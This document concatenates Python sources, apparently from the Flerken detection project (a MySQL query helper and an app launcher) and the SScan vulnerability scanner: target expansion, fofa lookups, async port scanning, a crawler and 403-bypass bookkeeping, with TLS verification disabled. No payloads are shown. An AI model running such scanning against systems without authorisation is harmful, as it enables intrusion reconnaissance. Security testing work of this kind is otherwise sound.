self.whereValueArray.append(array[1][i])
expQueryString += ')'
elif isinstance(array[1], str):
explode_array = array[1].split(',')
length = len(explode_array)
expQueryString += column + string + '('
expQueryString += '%s'
self.whereValueArray.append(explode_array[0])
for i in range(1, length):
expQueryString += ',%s'
self.whereValueArray.append(explode_array[i])
expQueryString += ')'
else:
self.throw_exception('error param after [NOT]IN:' + array[1])
elif exp_type == "EXP":
if isinstance(array[1], str):
expQueryString += column + array[1]
else:
self.throw_exception('error param after exp:' + array[1])
else:
self.throw_exception('error params:"' + array[0] + '"')
return expQueryString
def _parseMultiQuery(self, column, array):
multiQueryString = ''
start = column.find('.')
specialChar_index = column.find('`')
if specialChar_index == -1 and start == -1:
column = '`' + column + '`'
length = len(array) - 2
logic = ' AND '
if array[-2] != '':
if array[-2].upper() in self.SQL_logic:
logic = ' ' + array[-2].upper() + ' '
else:
self.throw_exception('Logical Operators "' + array[-2] + '"is not supported in multiple condition query')
for i in range(length):
if isinstance(array[i], (list, tuple)):
multiQueryString += logic + self._singleKey2Array(column, array[i])
else:
multiQueryString += logic + column + ' = %s'
self.whereValueArray.append(array[i])
multiQueryString = multiQueryString.lstrip(logic)
multiQueryString = '( ' + multiQueryString + ' )'
return multiQueryString
def _addSpecialChar(self, value):
value = value.strip()
if value.find(' as ') != -1:
value = re.sub('\s+', ' ', value)
MatchObject = re.search('(?<=\s{1}as\s{1})\w+$', value, re.I)
if MatchObject == None:
self.throw_exception('"' + value + '"regex error, please try again')
else:
table_alias = MatchObject.group(0)
value = re.sub('(?<=\s{1}as\s{1})\w+$', '`' + table_alias + '`', value, 0, re.I)
table_name = re.search('^.*(?=\s{1}as\s{1}`)', value, re.I).group(0)
if re.match('^\w+$', table_name):
value = re.sub('^\w+(?=\s{1}as\s{1}`)', '`' + table_name + '`', value, 0, re.I)
elif re.match('^\w+\.\w+$', value):
pass
else:
if not re.search('\W+', value):
value = '`' + value + '`'
return value
def _replaceSpecialChar(self, pattern, replacement, subject):
for val in replacement:
if isinstance(val, int):
subject = re.sub(pattern, str(val), subject, 1)
else:
subject = re.sub(pattern, pdo_quote(val), subject, 1)
return subject
def _get_file_lastline(self, file_name, n=1):
try:
with open(file_name, 'rb') as f:
f.seek(-1, 2)
content = ''
while n > 0:
s = f.read(1).decode('ascii')
if s == '\n' and content:
n -= 1
if n == 0:
break
content = ''
content = s + content
f.seek(-2, 1)
return content.strip()
except BaseException as e:
self.throw_exception(e)
def _clearSubString(self):
self.SQLerror = {}
self.fieldString = ''
self.joinString = ''
self.whereString = ''
self.groupString = ''
self.havingString = ''
self.orderString = ''
self.limitString = ''
self.aliasString = ''
self.tmp_table = ''
self.fetchSql = False
self.whereStringArray = []
self.whereValueArray = []
def haveErrorThrowException(self, err):
if self.dbdebug:
self.SQLerror = {
'errno': err.errno,
'sqlstate': err.sqlstate,
'msg': err.msg,
'sql': self.queryStr
}
return False
def showError(self):
if self.dbdebug:
if 'errno' in self.SQLerror:
print('Error Code: ' + str(self.SQLerror['errno']))
print('SQLSTATE: ' + self.SQLerror['sqlstate'])
print('Error Message: ' + self.SQLerror['msg'])
print('Error SQL: ' + self.SQLerror['sql'])
else:
print("no error deteced in the most recent SQL query")
else:
print("set DEBUG to True to show the complete error message")
def getNumRows(self):
return self.numRows
def close(self):
if self.connected:
# self.cur.close()
self.con.close()
def __del__(self):
self.close()
def throw_exception(self, errMsg, ignore_debug=False):
if self.dbdebug or ignore_debug:
print('Error: ' + errMsg + '\n\n' + 'stack: \n')
length = len(traceback.format_stack())
for i in range(length - 1):
print(traceback.format_stack()[i])
else:
errMsg = "unknow error"
print(errMsg)
sys.exit(0)
def isset(variable):
    """PHP-style isset(): True if *variable* (a name string) is defined in
    the CALLER's local or global scope.

    Fix: the original checked isset's own locals()/globals(), so it could
    never see the caller's variables; the caller's frame is inspected
    instead.
    """
    import inspect
    frame = inspect.currentframe().f_back
    try:
        return variable in frame.f_locals or variable in frame.f_globals
    finally:
        # break the reference cycle created by holding a frame object
        del frame
def is_numeric(var):
    """True if *var* converts cleanly to float (PHP-like is_numeric).

    Fix: float() raises TypeError (not ValueError) for None, lists, etc.;
    both are now caught instead of propagating.
    """
    try:
        float(var)
        return True
    except (TypeError, ValueError):
        return False
# PDO::quote-style escaping for debug SQL rendering.
def pdo_quote(string):
    """Return *string* single-quoted with ', ", %, _ and \\ backslash-escaped.

    Fix: the original lookbehind (?<=[^\\\\]) required a preceding character,
    so a special character at position 0 (e.g. a leading quote) was never
    escaped -- a quoting hole.  Every occurrence is now escaped; values are
    assumed to be raw (not pre-escaped).
    """
    return "'" + re.sub(r"(['\"%_\\])", r"\\\1", str(string)) + "'"
# ThinkPHP-style M() factory shortcut.
def M(dbtable, ConfigID=0, dbConfig=None):
    """Return a pythonMySQL model bound to *dbtable*, using connection
    config slot *ConfigID* or an explicit *dbConfig* dict."""
    model = pythonMySQL(dbtable, ConfigID, dbConfig)
    return model
--- FILE SEPARATOR ---
#!/usr/bin/python
# -*-coding:utf-8-*-
"""
The Entry of Flerken App
"""
__author__ = 'Yao Zhang & Zhiyang Zeng'
__copyright__ = "Copyright 2019, Apache License 2.0"
from flerken import app
from flerken.config.global_config import APP_CONFIG
# Start the Flerken web app on the configured host/port.
# NOTE(review): module level, no __main__ guard -- importing this module
# starts the server; confirm that is intended before adding a guard.
app.run(host=APP_CONFIG['HOST'],port=APP_CONFIG['PORT'])
|
[
"/coverage/coverage_test.py",
"/flerken/__init__.py",
"/flerken/config/global_config.py",
"/flerken/control/plugins/custom_meta_chars_plugin.py",
"/flerken/control/plugins/linux_generic_detect_plugin.py",
"/flerken/control/plugins/linux_generic_filter_plugin.py",
"/flerken/control/plugins/linux_graphic_detect_plugin.py",
"/flerken/control/plugins/linux_special_detect_plugin.py",
"/flerken/control/plugins/win_generic_detect_plugin.py",
"/flerken/control/plugins/win_special_detect_plugin.py",
"/flerken/control/plugins/win_special_filter_plugin.py",
"/flerken/control/smart_detect.py",
"/flerken/detection.py",
"/flerken/landing.py",
"/flerken/lib/mysql_conn.py",
"/runApp.py"
] |
02bx/SScan
|
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import fire
import os
from datetime import datetime
from lib.config.log import logger, log_path
import glob
import re
import time
from lib.config.banner import SScan_banner
from lib.common.report import save_report, save_fofa
from lib.common.common import prepare_targets, scan_process
from lib.module.proxy import checkProxyFile
from lib.config.data import fofa_info
from lib.config import setting
from lib.common.utils import clear_queue, check_fofa, ctrl_quit, read_rules
import multiprocessing
import signal
import warnings
warnings.filterwarnings('ignore')
# 进度条设置
from rich.progress import (
BarColumn,
TimeRemainingColumn,
TransferSpeedColumn,
Progress,
)
class SScan(object):
    """
    InfoScan help summary page\n
    InfoScan is a Sensitive information detection and vulnerability scanning program
    Example:
        python3 SScan.py version
        python3 SScan.py --host example.com run
        python3 SScan.py --file domains.txt run
    :param str host: HOST1 HOST2 ... Scan several hosts from command line
    :param str file: Load new line delimited targets from TargetFile
    :param str dire: Load all *.txt files from TargetDirectory
    :param int network: Scan all Target/MASK neighbour hosts, should be an int between 8 and 31
    :param int t: Num of scan threads for each scan process, 10 by default
    :param tuple rule: RuleFileName1,RuleFileName2,... Import specified rules files only.
    :param bool crawl: crawling, crawl <a href='...'> (default True)
    :param bool checkcdn: Check the CDN and skip the IP where the CDN exists (default True)
    :param bool full: Process all sub directories /x/y/z/,/x/ /x/y/ (default True)
    :param str script: ScriptName1,ScriptName2,...
    :param bool script_only: Scan with user scripts only
    :param bool noscripts: Disable all scripts (default False)
    :param bool browser: Do not open web browser to view report (default True)
    :param bool fofa: Save the results of the FOFA search (default True)
    """
    def __init__(self, host=None, file=None, dire="", network=32, t=100, rule=None,
                 full=True, script=None, noscripts=False, crawl=True,
                 browser=True, script_only=False, checkcdn=True, fofa=True):
        # Raw CLI options (python-fire maps command-line flags onto these).
        self.host = host
        self.file = file
        self.rule_files = []    # resolved rule file paths (filled by config_param)
        self.script_files = []  # resolved script file paths (filled by config_param)
        self.dire = dire
        self.network = network
        self.t = t
        self.rule = rule
        self.crawl = crawl
        self.checkcdn = checkcdn
        # NOTE(review): 'fileull' looks like a typo for 'full'; kept as-is
        # because other modules may already read args.fileull -- confirm
        # before renaming.
        self.fileull = full
        self.scripts_only = script_only
        self.script = script
        self.no_scripts = noscripts
        self.browser = browser
        self.fofa = fofa
        # Input sources: explicit file > directory of *.txt > literal host list.
        # NOTE(review): if none of the three is given input_files is never
        # set; check_param() exits first in normal runs.
        if self.file:
            self.input_files = [self.file]
        elif self.dire:
            self.input_files = glob.glob(self.dire + '/*.txt')
        elif self.host:
            self.input_files = [self.host]
        self.require_no_http = True      # True while no plugin needs the HTTP connection pool
        self.require_index_doc = False   # a plugin needs the index page fetched
        self.require_ports = set()       # extra ports requested by plugins
        self.text_to_find, self.regex_to_find, self.text_to_exclude, self.regex_to_exclude, self.rules_set, self.rules_set_root_only = None, None, None, None, None, None
    # Load rule and script configuration.
    def config_param(self):
        """
        Config parameter
        """
        if self.dire:
            self.dire = glob.glob(self.dire + '/*.txt')
        # Rules: default to every pocs/rules/*.txt, otherwise resolve the
        # requested names (adding a .txt suffix when missing).
        if self.rule is None:
            self.rule_files = glob.glob('pocs/rules/*.txt')
        else:
            if isinstance(self.rule, str):
                rule = self.rule.split()
            else:
                rule = self.rule
            for rule_name in rule:
                if not rule_name.endswith('.txt'):
                    rule_name += '.txt'
                if not os.path.exists('pocs/rules/%s' % rule_name):
                    logger.log('FATAL', f'Rule file not found: {rule_name}')
                    exit(-1)
                self.rule_files.append(f'pocs/rules/{rule_name}')
        # Unless running scripts-only, parse the rule files.
        if not self.scripts_only:
            self.text_to_find, self.regex_to_find, self.text_to_exclude, self.regex_to_exclude, self.rules_set, self.rules_set_root_only = read_rules(self.rule_files)
        # When scripts are enabled, resolve the script files.
        if not self.no_scripts:
            if self.script is None:
                self.script_files = glob.glob('pocs/scripts/*.py')
            else:
                if isinstance(self.script, str):
                    script = self.script.split()
                else:
                    script = self.script
                for script_name in script:
                    if not script_name.lower().endswith('.py'):
                        script_name += '.py'
                    if not os.path.exists('pocs/scripts/%s' % script_name):
                        logger.log('FATAL', f'script file not found: {script_name}')
                        exit(-1)
                    self.script_files.append('pocs/scripts/%s' % script_name)
            # Inspect each script source to learn what it needs: the HTTP
            # connection pool, the index document, and any
            # 'ports_to_check = ...' declarations.
            pattern = re.compile(r'ports_to_check.*?=(.*)')
            for _script in self.script_files:
                with open(_script, encoding='UTF-8', errors='ignore') as f:
                    content = f.read()
                if content.find('self.http_request') >= 0 or content.find('self.session') >= 0:
                    self.require_no_http = False  # script depends on the HTTP pool
                if content.find('self.index_') >= 0:
                    self.require_no_http = False
                    self.require_index_doc = True
                # Ports the plugin wants scanned.
                m = pattern.search(content)
                if m:
                    m_str = m.group(1).strip()
                    if m_str.find('#') >= 0:  # strip a trailing comment
                        m_str = m_str[:m_str.find('#')]
                    if m_str.find('[') < 0:
                        if int(m_str) not in self.require_ports:
                            self.require_ports.add(int(m_str))
                    else:
                        # NOTE(review): eval() on script file content -- only
                        # run scripts from a trusted pocs/ directory.
                        for port in eval(m_str):
                            if port not in self.require_ports:
                                self.require_ports.add(int(port))
    # Validate command-line input.
    def check_param(self):
        """
        Check parameter
        """
        if not (self.file or self.dire or self.host):
            msg = '\nself missing! One of following self should be specified \n' \
                  ' \t--f TargetFile \n' \
                  ' \t--d TargetDirectory \n' \
                  ' \t--host www.host1.com www.host2.com 8.8.8.8'
            logger.log('FATAL', msg)
            exit(-1)
        if self.file and not os.path.isfile(self.file):
            logger.log('FATAL', f'TargetFile not found: {self.file}')
            exit(-1)
        if self.dire and not os.path.isdir(self.dire):
            # NOTE(review): message says 'TargetFile' for a directory check.
            logger.log('FATAL', f'TargetFile not found: {self.dire}')
            exit(-1)
        self.network = int(self.network)
        # NOTE(review): the message below says 24..31 but the check is 8..32.
        if not (8 <= self.network <= 32):
            logger.log('FATAL', f'Network should be an integer between 24 and 31')
            exit(-1)
    def main(self):
        """Orchestrate the scan: prepare targets in a child process, fan out
        a worker pool over them, drive the progress bar, and hand results to
        the live reporter thread."""
        q_targets = multiprocessing.Manager().Queue()   # targets queue
        q_targets_list = []
        q_results = multiprocessing.Manager().Queue()   # results queue
        fofa_result = multiprocessing.Manager().Queue() # fofa results queue
        # Scan processes may only start exiting once target prep is done.
        process_targets_done = multiprocessing.Value('i', 0)
        for input_file in self.input_files:
            # Read the targets.
            if self.host:
                target_list = self.host.replace(',', ' ').strip().split()
            elif self.file or self.dire:
                with open(input_file, encoding='UTF-8', errors='ignore') as inFile:
                    target_list = list(set(inFile.readlines()))
            try:
                import threading
                # The report is generated live while results arrive.
                target_count = len(target_list)  # number of targets
                # save_report also manages standard output for the run.
                threading.Thread(target=save_report, args=(self, q_results, input_file, target_count)).start()
                clear_queue(q_results)
                clear_queue(q_targets)
                process_targets_done.value = 0
                start_time = time.time()
                p = multiprocessing.Process(
                    target=prepare_targets,
                    args=(target_list, q_targets, self, fofa_result))
                p.daemon = True
                p.start()
                p.join()  # block until target preparation has finished
                time.sleep(1.0)  # small grace period after prepare_targets
                logger.log('INFOR', f'All preparations have been completed and it took %.1f seconds!' % (
                        time.time() - start_time))
                # Size the worker pool; with few targets cap it at 2x the
                # target count.
                # count = multiprocessing.cpu_count()
                count = 30
                if len(target_list) * 2 < count:
                    count = len(target_list) * 2
                if self.fofa and fofa_result.qsize() > 0:
                    # Persist the fofa search results.
                    save_fofa(self, fofa_result, input_file)
                # Drain the target queue into a list for the pool.
                while True:
                    if not q_targets.empty():
                        q_targets_list.append(q_targets.get())
                    else:
                        break
                # Each item looks like:
                # {'scheme': 'https', 'host': '127.0.0.1', 'port': 443,
                #  'path': '', 'ports_open': [80, 443], 'is_neighbor': 0}
                progress = Progress(
                    "[progress.description]{task.description}",
                    BarColumn(),
                    "[progress.percentage]{task.percentage:>3.1f}%",
                    "•",
                    "[bold green]{task.completed}/{task.total}",
                    transient=True,  # hide the bar once it reaches 100%
                )
                with progress:
                    targets = []
                    for target in q_targets_list:
                        tmp = [target, q_results, self]
                        targets.append(tmp)
                    progress_bar = progress.add_task("[cyan]Leak detection...", total=len(targets), start=False)
                    with multiprocessing.Pool(processes=count) as pool:
                        results = pool.imap_unordered(scan_process, targets)
                        # advance the bar as each worker finishes a target
                        for result in results:
                            progress.advance(progress_bar)
                        pool.close()
                        pool.join()
                time.sleep(1.0)  # let in-flight queue writes settle
                cost_time = time.time() - start_time
                cost_min = int(cost_time / 60)
                cost_min = '%s min ' % cost_min if cost_min > 0 else ''
                cost_seconds = '%.1f' % (cost_time % 60)
                logger.log('INFOR', f'Scanned {len(q_targets_list)} targets in {cost_min}{cost_seconds} seconds.')
            except Exception as e:
                logger.log('FATAL', f'[__main__.exception] %s' % repr(e))
                import traceback
                logger.log('FATAL', traceback.format_exc())
        # signal the reporter thread to stop
        setting.stop_me = True
    def print(self):
        """
        InfoScan running entrance
        :return: All subdomain log
        :rtype: list
        """
        # NOTE: 'print' as a method name only shadows the builtin as a class
        # attribute; the calls below still resolve to builtins.print.
        print(SScan_banner)
        dt = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        print(f'[*] Starting InfoScan @ {dt}\n')
        self.check_param()
        self.config_param()
        if self.fofa:
            self.fofa = check_fofa()
        # Fetch high-quality proxy IPs (currently disabled).
        # checkProxyFile()
        if self.no_scripts:
            logger.log('INFOR', f'Scripts scan was disabled.')
        if self.require_ports:
            logger.log('INFOR', f'Scripts scan port check: %s' % ','.join([str(x) for x in self.require_ports]))
    def run(self):
        """Banner + parameter validation, then the scan loop."""
        self.print()
        self.main()
    @staticmethod
    def version():
        """
        Print version information and exit
        """
        print(SScan_banner)
        exit(0)
if __name__ == '__main__':
    # Exit gracefully on Ctrl-C / SIGTERM (ctrl_quit handles cleanup).
    signal.signal(signal.SIGINT, ctrl_quit)
    signal.signal(signal.SIGTERM, ctrl_quit)
    # python-fire turns the SScan class into the CLI: flags map to __init__
    # parameters, subcommands to methods (run / version).
    fire.Fire(SScan)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
from lib.config.log import logger
from urllib.parse import urlparse
from lib.common.scanner import Scanner
from lib.module.iscdn import check_cdn
from lib.module.fofa import Fofa
from lib.module.PortScan import PortScan
from lib.common.utils import add_ip
from lib.config.setting import web_ports
# Vulnerability scan worker.
def scan_process(targets):
    """Pool worker: scan one target and push its results onto the queue.

    *targets* is a 3-tuple (target_dict, results_queue, cli_args); the
    target dict looks like
    {'scheme': 'https', 'host': '127.0.0.1', 'port': 443, 'path': '',
     'ports_open': [443, 8088], 'script': True, 'has_http': True}.
    Always returns the target so imap_unordered progress keeps advancing.
    """
    target, q_results, args = targets[0], targets[1], targets[2]
    scanner = Scanner(args=args)
    try:
        # Prepare the target info, load rules/scripts, then scan.
        ret = scanner.init_from_url(target)
        if ret:
            host, results = scanner.scan()
            if results:
                q_results.put((host, results))
    except Exception as e:
        logger.log('DEBUG', f'{e}')
    # Fix: the original `finally: return target` also swallowed
    # BaseExceptions (KeyboardInterrupt/SystemExit) raised in the worker.
    return target
# Build the probes each target needs: 80/443, any explicit port, and the
# ports requested by scripts.
def get_host_port_list(queue_targets, args):
    """Expand raw target strings into (host, port, scheme, path, web_port)
    tuples for the TCP port scanner.

    The trailing web_port is the port of the target's own web service; the
    scanner later checks whether it is open to decide if rule scanning
    applies.
    NOTE(review): in scripts-only mode a scheme-less, port-less target
    leaves web_port as None -- confirm PortScan tolerates that.
    """
    probes = []
    for raw_target in queue_targets:
        url = raw_target
        if url.find('://') < 0:
            scheme = 'unknown'
            slash_at = url.find('/')
            netloc = url[:slash_at] if slash_at > 0 else url
            # NOTE(review): any path on a scheme-less target is discarded.
            path = ''
        else:
            # e.g. scheme='http', netloc='www.baidu.com:80', path=''
            scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
        # An explicitly named port must itself be probed for openness.
        if netloc.find(':') >= 0:
            pieces = netloc.split(':')
            host = pieces[0]
            http_port = int(pieces[1])
        else:
            host = netloc
            http_port = None
        # Default web port from the scheme.
        if http_port is None:
            if scheme == 'https':
                http_port = 443
            elif scheme == 'http':
                http_port = 80
        # Infer the scheme from well-known ports.
        if scheme == 'unknown':
            if http_port == 80:
                scheme = 'http'
            elif http_port == 443:
                scheme = 'https'
        # Scripts-only mode skips the explicit/80/443 web probes.
        if not args.scripts_only:
            if http_port:  # the url named a port explicitly
                probes.append((host, http_port, scheme, path, http_port))
            else:          # no port named: probe every configured web port
                http_port = 80
                for web_port in web_ports:
                    probes.append((host, web_port, scheme, path, web_port))
        # Unless scripts are disabled, add the ports the scripts ask for.
        if not args.no_scripts:
            for script_port in args.require_ports:
                probes.append((host, script_port, scheme, path, http_port))
    return probes
# Wrap and normalise scan results into the final target map, e.g.
# {'127.0.0.1': {'scheme': 'http', 'host': '127.0.0.1', 'port': 80,
#                'path': '', 'ports_open': [80, 3306], 'script': True}}
def get_target(ps_result, q_fofa):
    """Fold open-port scan tuples (and optional fofa hits) into a dict
    keyed by host (or host:port netloc for fofa-discovered assets)."""
    targets = {}
    for entry in ps_result:
        # entry: (host, port, state, scheme, path, web_port)
        if entry[2] != 'open':
            continue
        host = entry[0]
        scheme = entry[3]
        path = entry[4]
        if host in targets:
            open_ports = targets[host]['ports_open']
            port = entry[1]
            if port not in open_ports:
                open_ports.append(port)
            targets[host].update(ports_open=open_ports)
        else:
            targets[host] = {'scheme': scheme, 'host': host, 'port': entry[5],
                             'path': path, 'ports_open': [entry[1]], 'script': True}
    if q_fofa:
        # Merge the fofa search results.
        for hit in q_fofa:
            url = hit[0]
            # e.g. scheme='http', netloc='www.baidu.com:80', path=''
            scheme, netloc, path, params, query, fragment = urlparse(url, 'http')
            host_port = netloc.split(':')
            host = host_port[0]
            port = int(host_port[1]) if len(host_port) == 2 else 80
            if host in targets.keys() and (port == 80 or port == 443):
                # already covered by the port scan above
                continue
            # A host we already probed keeps script=False so scripts are not
            # run against it twice.
            script_flag = host not in targets.keys()
            targets[netloc] = {'scheme': scheme, 'host': netloc, 'port': port,
                               'path': path, 'ports_open': [port], 'script': script_flag}
    return targets
# Use async coroutines to check whether each target's 80/443/extra ports
# are open, then enqueue the formatted scan targets.
def process_targets(queue_targets, q_targets, args, q_fofa):
    """Port-scan every candidate and push formatted target dicts onto q_targets.

    queue_targets: raw target strings, e.g. ['http://127.0.0.1:8080', 'www.baidu.cn']
    q_targets:     multiprocessing queue receiving the final target dicts
    args:          parsed CLI options (the SScan instance)
    q_fofa:        optional fofa hits merged into the target set
    """
    # Normalise targets and the ports to probe, e.g.
    # [('127.0.0.1', 8080, 'http', '/', 8080),
    #  ('www.baidu.cn', 80, 'unknown', '/', 80),
    #  ('www.baidu.cn', 443, 'unknown', '/', 443)]
    host_port_list = get_host_port_list(queue_targets, args)
    # Coroutine-based TCP port scan.
    ps = PortScan(host_port_list, 2000)
    # ps_result example: {'127.0.0.1': [443, 80]}
    ps_result = ps.async_tcp_port_scan()
    # Fold scan results (plus fofa hits) into per-host target dicts.
    targets = get_target(ps_result, q_fofa)
    for host in targets:
        target = targets[host]
        ports_open = target['ports_open']
        # Prefer HTTPS on 443 when both standard web ports are open.
        if 80 in ports_open and 443 in ports_open:
            target.update(port=443)
            target.update(scheme='https')
        elif 80 in ports_open:
            target.update(port=80)
            target.update(scheme='http')
        elif 443 in ports_open:
            target.update(port=443)
            target.update(scheme='https')
        # has_http: the chosen port, or a standard web port, answered the scan.
        if target['port'] in ports_open or 80 in ports_open or 443 in ports_open:
            target['has_http'] = True
        else:
            target['has_http'] = False
        # Final scan target, e.g.
        # {'scheme': 'http', 'host': '127.0.0.1', 'port': 8088, 'path': '/',
        #  'ports_open': [8088], 'script': True, 'has_http': True}
        q_targets.put(target)
def prepare_targets(targets, q_targets, args, fofa_result):
    """Filter/normalise raw targets and enqueue the final scan targets.

    Runs in its own process (see SScan.main): CDN check, optional fofa
    expansion, neighbour-IP expansion, dedupe, then port probing via
    process_targets().
    """
    # queue_targets: valid targets plus their resolved IPs;
    # valid_targets: the valid targets themselves, fed to the fofa lookup.
    # TODO(upstream): queue_targets is not deduped across scheme variants,
    # e.g. ['127.0.0.1', 'http://127.0.0.1'] are both kept.
    queue_targets, valid_targets = check_cdn(targets, args)
    # Live web assets discovered via fofa.
    q_fofa = []
    # With a fofa API configured, widen the asset set from valid_targets.
    if args.fofa and valid_targets:
        fofa = Fofa(valid_targets, fofa_result)
        q_fofa = fofa.run()
    # For plain IPs, add neighbour hosts for the requested netmask
    # (CDN-backed targets do not get neighbours added).
    ip_subnet = add_ip(args, queue_targets)
    # Merge and dedupe.
    queue_targets.extend(ip_subnet)
    queue_targets = list(set(queue_targets))
    # q_fofa example: [('http://127.0.0.1:3790', '403 Forbidden'),
    #                  ('http://127.0.0.1', 'Welcome to CentOS')]
    # Probe 80/443/extra ports asynchronously, format the targets and push
    # them onto q_targets.
    process_targets(queue_targets, q_targets, args, q_fofa)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import requests
from requests.adapters import HTTPAdapter
from lib.config import setting
# 禁用安全请求警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
'''
Connection pooling

HTTP runs on top of TCP: each request pays for the TCP three-way handshake
before the request/response exchange and the final teardown. Issuing many
HTTP requests this way repeats that cost every time, and HTTPS is worse --
the TLS setup adds several more packets per connection (four beyond the
ACKs). Reusing an established TCP/HTTP connection for multiple transfers
avoids that overhead, which is the idea behind an "HTTP(S) connection pool".
'''
def conn_pool():
    """Create a requests.Session backed by an urllib3 connection pool.

    Returns a session with default headers applied, TLS verification off
    (self-signed scan targets) and environment proxies ignored.
    """
    pooled_session = requests.Session()
    # NOTE(review): 'keep_alive' is a plain attribute, not a requests API --
    # it likely has no effect; confirm before relying on it.
    pooled_session.keep_alive = False
    pooled_session.headers = setting.default_headers
    # pool_connections: number of cached urllib3 pools (not connections);
    # pool_maxsize: max connections per pool; pool_block=False means don't
    # block when a pool is exhausted.  max_retries is left at the requests
    # default (no retries).
    http_adapter = HTTPAdapter(pool_connections=10, pool_maxsize=100, pool_block=False)
    # Route both plain and TLS traffic through the adapter.
    pooled_session.mount('http://', http_adapter)
    pooled_session.mount('https://', http_adapter)
    # HTTPS would otherwise fail on self-signed certificates.
    pooled_session.verify = False
    # Ignore system proxy environment variables.
    pooled_session.trust_env = False
    return pooled_session
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# @Author : yhy
import requests
import asyncio
from concurrent.futures import ThreadPoolExecutor
# 禁用安全请求警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import importlib
from yarl import URL
import traceback
import re
import time
import os
from bs4 import BeautifulSoup
from lib.config.log import logger
from lib.common.utils import get_domain_sub, cal_depth, get_html
from lib.config.setting import proxyList, default_headers
from lib.common.connectionPool import conn_pool
class Scanner(object):
    def __init__(self, args):
        # One Scanner instance per worker process; it is reused across
        # targets via init_from_url()/reset_scanner().  *args* is the parsed
        # CLI options object (the SScan instance).
        self.args = args
        self.start_time = time.time()
        self.time_flag = True
        self.links_limit = 100  # max number of folders to scan
        self._init_rules()
        self._init_scripts()
        # Per-target wall-clock budget in seconds (30 minutes; the original
        # comment claiming a 10-minute default was stale).
        self.timeout = 30 * 60
        self.session = conn_pool()  # pooled requests.Session
        self.url_list = list()      # work queue of urls still to scan
        self.urls_processed = set() # processed urls
        self.urls_enqueued = set()  # urls that ever entered the queue
        self.urls_crawled = set()
        self._302_url = set()  # 302 targets whose landing page matched the blacklist
        self._403_url = []     # response bodies of 403 urls
        self.results = {}
        self._404_status = -1
        self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
        self.scheme, self.host, self.port, self.path = None, None, None, None
        self.domain_sub = ''
        self.base_url = ''
        self.max_depth = 0
        self.len_404_doc = 0
        self.has_http = None
        self.script = None
        self.ports_open = None
        self.ports_closed = None
        self.no_scripts = None
        self.status_502_count = 0
        self.flag = False
        self.check = True  # set False after repeated 502s; stop checking the site
def reset_scanner(self):
self.start_time = time.time()
self.url_list.clear()
self.urls_processed.clear()
self.urls_enqueued.clear()
self.urls_crawled.clear()
self.results.clear()
self._404_status = -1
self.index_status, self.index_headers, self.index_html_doc = None, {}, ''
self.scheme, self.host, self.port, self.path = None, None, None, None
self.domain_sub = ''
self.base_url = ''
self.status_502_count = 0
# scan from a given URL
'''
{'scheme': 'http', 'host': '127.0.0.1', 'port': 8088, 'path': '/', 'ports_open':[8088], 'script': True, 'has_http': True}
'''
def init_from_url(self, target):
self.reset_scanner()
self.scheme = target['scheme']
self.host = target['host']
self.port = target['port']
self.path = target['path']
self.has_http = target['has_http']
self.script = target['script']
self.ports_open = target['ports_open']
self.domain_sub = get_domain_sub(self.host) # baidu.com >> baidu
self.init_final()
return True
def init_final(self):
if self.scheme == 'http' and self.port == 80 or self.scheme == 'https' and self.port == 443:
self.base_url = f'{self.scheme}://{self.host}'
elif self.scheme != 'unknown' and self.host.find(':') >= 0:
self.base_url = f'{self.scheme}://{self.host}'
else:
self.base_url = f'{self.scheme}://{self.host}:{self.port}'
if not self.has_http:
logger.log('DEBUG', f'NO_HTTP_Scan %s:%s' % (self.host, self.port) if self.port else 'Scan %s' % self.host)
# 脚本
if self.script:
for _ in self.user_scripts:
self.url_list.append((_, '/'))
if not self.has_http or self.args.scripts_only: # 未发现HTTP服务 或 只依赖插件扫描
return
# todo 当url 类似 http://www.example.com , path:'' , max_depth = 1+5=6
self.max_depth = cal_depth(self, self.path)[1] + 5
self.check_404_existence()
if self._404_status == -1:
logger.log('DEBUG', f'HTTP 404 check failed %s' % self.base_url)
elif self._404_status != 404:
logger.log('DEBUG', f'%s has no HTTP 404. {self._404_status}' % self.base_url)
_path, _depth = cal_depth(self, self.path)
# 加入队列
self.enqueue('/')
# 进行http请求
def http_request(self, url, timeout=10):
try:
if not url:
url = '/'
if not self.session:
return -1, {}, ''
# 使用代理,但是代理效果不是很好,这里就不使用了
# self.session.proxies = random.choice(proxyList)
#
# self.session.proxies = {
# "https": "https://127.0.0.1:8080",
# "http": "http://127.0.0.1:8080"
# }
resp = self.session.get(self.base_url + url, allow_redirects=False, headers=default_headers, timeout=timeout)
headers = resp.headers
status = resp.status_code
# 502出现3次以上,排除该站点
if status == 502:
self.status_502_count += 1
if self.status_502_count > 3:
self.url_list.clear()
try:
if self.session:
self.session.close()
except Exception as e:
logger.log('DEBUG', f'{str(e)}')
pass
self.session = None
# 301 永久移动时,重新获取response
if status == 301:
target = headers.get('Location')
if not target.startswith('/file:'):
try:
resp = self.session.get(URL(target, encoded=True), headers=default_headers, allow_redirects=False, timeout=timeout, verify=False)
headers = resp.headers
except Exception as e:
logger.log('DEBUG', f'{e}, {target} {self.base_url + url}')
pass
# 前面禁止重定向, 但有时,网页重定向后才会有东西
if status == 302:
new_url = headers["Location"]
if new_url not in self._302_url:
resp = self.session.get(URL(new_url, encoded=True), headers=default_headers, timeout=timeout, verify=False)
headers = resp.headers
self._302_url.add(new_url)
html_doc = get_html(headers, resp)
# 页面不在黑名单规则里面时, 403 返回包 记录,扫描完成后计算大小,然后再判断是否进行403绕过
# 若 403 返回包 的最终个数小于20,则不进行绕过测试,认为是一种网站防扫描措施
if not self.find_exclude_text(html_doc) and status == 403:
self._403_url.append(url)
logger.log('DEBUG', f'{self.base_url + url} status: {status}')
return status, headers, html_doc
except requests.exceptions.RetryError as e:
logger.log('DEBUG', f'{str(e)} {self.base_url + url}')
return -1, {}, ''
